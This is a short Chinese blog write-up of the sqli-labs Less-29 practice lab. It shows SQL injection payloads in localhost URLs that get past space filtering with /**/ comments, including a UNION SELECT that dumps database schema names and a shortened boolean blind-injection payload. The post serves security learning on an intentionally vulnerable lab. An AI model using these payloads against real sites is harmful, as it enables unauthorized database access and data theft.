[sqli-labs]Less-29(明注 , 替换空格 , Bool盲注)

这道题发现页面中会显示出GET过去的参数
不过好像没有URL解码...
好奇怪 , 感觉好像是传过去之后又被编码了 , 还没有看源码 , 暂时不能确定
这样的话 , 说明执行的SQL语句就是URL编码以后的 , 这样肯定是不行的
用Burp抓包重放试试

后记 :
URL编码过滤了空格等等特殊字符 , 可以通过这样验证存在注入点

http://127.0.0.1/Less-29/?id=0'union/**/select/**/1,1,1/**/--+
http://127.0.0.1/Less-29/?id=0%27union/**/select/**/1,group_concat(schema_name),1/**/from/**/information_schema.schemata--+
这样就可以dump数据了

后记 :

还是可以利用前面的Payload通杀盲注
http://127.0.0.1/Less-28a/?id=0%27%20or()or%20%27%27=%271

后来发现这个Payload还可以简化
在mysql中也有弱类型机制 , '0' 和 '1' 可以分别表示假和真
简化后 :
?id=0'||()||'0
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容